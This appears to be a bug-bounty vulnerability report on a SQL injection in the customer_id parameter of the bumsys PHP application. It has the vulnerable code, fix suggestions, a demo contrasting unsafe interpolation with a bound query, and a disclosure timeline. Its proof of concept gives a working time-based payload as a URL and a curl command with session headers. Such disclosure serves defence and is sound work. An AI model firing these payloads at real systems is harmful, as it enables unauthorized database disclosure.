SQL Injection in 'core/ajax/ajax_data.php' in unilogies/bumsys

Valid

Reported on

Feb 28th 2023


Description

There exists an SQL injection affecting the customer_id parameter located in the file core/ajax/ajax_data.php

Let's take a look at the following code: https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L537

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

The core problem is that, even though the function safe_input() is used in an effort to sanitize the customer_id value, as seen here https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L447

    $customer_id = isset($_GET["customer_id"]) ? safe_input($_GET["customer_id"]) : "";

the query itself assumes customer_id is always an integer and interpolates it directly, without surrounding quotes. Because the value never sits inside a string literal, an attacker can inject SQL without ever needing a quote character, so sanitization aimed at quotes does not help here.

Fix

change

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

to

                    where stock_product_id = '{$product_id}' and sales_customer_id = '{$customer_id}' and product_stock.is_trash = 0
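The following is an added example, not code from bumsys, that reproduces the pattern described above against an in-memory SQLite table: a quote-escaping sanitizer stands in for safe_input() (an assumption about its behaviour, not taken from the project), the sanitized value is interpolated unquoted exactly as in the vulnerable query, and the same lookup is then rewritten to validate the ids as integers and bind them. The table, column names and sample rows are constructed for the demo; since SQLite has no SLEEP(), the payload `0 OR 1=1` plays the role of the report's time-based payload.

```php
<?php
// Added example (not bumsys code). Models the unquoted-integer interpolation
// from core/ajax/ajax_data.php and contrasts it with a bound query.
// Assumptions: the product_stock table, its columns and rows are constructed
// here; model_safe_input() is an assumed stand-in for safe_input().

function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE product_stock (
                   stock_product_id INTEGER,
                   sales_customer_id INTEGER,
                   is_trash INTEGER,
                   serial TEXT)');
    $ins = $db->prepare('INSERT INTO product_stock VALUES (?, ?, 0, ?)');
    // Constructed rows: customer 1 holds one unit of product 2, customer 7 holds two units.
    foreach ([[2, 1, 'SN-A'], [2, 7, 'SN-B'], [3, 7, 'SN-C']] as $row) {
        $ins->execute($row);
    }
    return $db;
}

// Stand-in for safe_input(): doubles quote characters and nothing else.
// This is an assumption about what a quote-oriented sanitizer does.
function model_safe_input(string $value): string {
    return str_replace(["'", '"'], ["''", '""'], $value);
}

// Vulnerable pattern: the sanitized value is interpolated without quotes,
// so a payload containing no quote characters reaches the parser untouched.
function vulnerable_lookup(PDO $db, string $product_id, string $customer_id): array {
    $product_id  = model_safe_input($product_id);
    $customer_id = model_safe_input($customer_id);
    $sql = "SELECT serial FROM product_stock
            WHERE stock_product_id = {$product_id}
              AND sales_customer_id = {$customer_id}
              AND product_stock.is_trash = 0";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: reject anything that is not a string of digits, cast,
// and bind the values so they can never be parsed as SQL.
function hardened_lookup(PDO $db, string $product_id, string $customer_id): array {
    if (!ctype_digit($product_id) || !ctype_digit($customer_id)) {
        throw new InvalidArgumentException('product_id and customer_id must be integers');
    }
    $stmt = $db->prepare('SELECT serial FROM product_stock
                          WHERE stock_product_id = ?
                            AND sales_customer_id = ?
                            AND product_stock.is_trash = 0');
    $stmt->execute([(int) $product_id, (int) $customer_id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = demo_db();

// Legitimate request: one serial belonging to customer 1.
print_r(vulnerable_lookup($db, '2', '1'));

// Injected request, no quote needed: the OR rewrites the WHERE clause and the
// sanitizer leaves the payload intact, so serials of every customer come back.
print_r(vulnerable_lookup($db, '2', '0 OR 1=1'));

// Same payload against the hardened lookup is rejected before any SQL is built.
try {
    hardened_lookup($db, '2', '0 OR 1=1');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// The hardened lookup still serves legitimate ids.
print_r(hardened_lookup($db, '2', '7'));
```

Run with `php example.php` (PDO with the sqlite driver is needed). Because `AND` binds tighter than `OR`, the injected clause becomes `(stock_product_id = 2 AND sales_customer_id = 0) OR (1=1 AND is_trash = 0)`, which matches every non-trashed row regardless of product or customer. Note that the quoting fix suggested above only holds up if safe_input() reliably escapes quote characters; validating the parameter as an integer and binding it, as in hardened_lookup(), removes the dependency on the sanitizer altogether.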

Proof of Concept

Make a GET request to http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1)) with a valid session and a valid CSRF token and observe the delay introduced by calling SLEEP(). Compare the response time against the same request with customer_id=0 so that ordinary server latency is not mistaken for the injected delay.

curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H 'Connection: keep-alive' -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=9vrsravv229bb68gm7ejpldhoj;' -H 'X-CSRF-TOKEN: 5f185b523d036a55a162dbf63d8b45b600275e92' --url "http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1))"

Impact

Authenticated users are able to disclose the contents of the database.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 23 days ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 22 days ago
Khurshid Alam validated this vulnerability 21 days ago

Good finding. Will fix soon. Thank you

TsarSec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in v2.0.2 with commit 6a328e 18 days ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability 18 days ago
Khurshid Alam
18 days ago

Maintainer


@admin, please assign a CVE.

Ben Harvie
10 days ago

Admin


CVE assigned as requested :)
